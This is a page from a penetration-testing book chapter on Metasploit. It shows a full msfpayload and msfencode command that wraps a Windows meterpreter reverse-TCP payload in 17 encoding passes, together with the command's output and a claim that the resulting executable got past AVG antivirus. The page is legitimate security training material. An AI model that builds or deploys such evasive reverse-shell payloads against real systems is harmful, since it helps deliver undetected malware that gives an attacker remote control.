104
Chapter 7
It is recommended that you test your script using an evaluation version
of a product to see if it bypasses the antivirus software prior to using it in a
penetration test. Here’s an example of using multiple encoding passes:
root@bt:/opt/framework3/msf3#
msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5
-t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e
x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5
-t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#
Here we use five counts at of
shikata_ga_nai
, feeding the code in raw
format at into two counts of
alpha_upper
encoding at , which is then fed
to another five counts of
shikata_ga_nai
,followed by five counts of
countdown
encoding at , before finally directing the output into the desired execut-
able. We are using a total of 17 encoding loops in an attempt to circumvent
the antivirus software. And, as you can see in Figure 7-3, we have successfully
slipped our payload past the antivirus engine.
Figure 7-3: AVG has not detected the multi-encoded payload.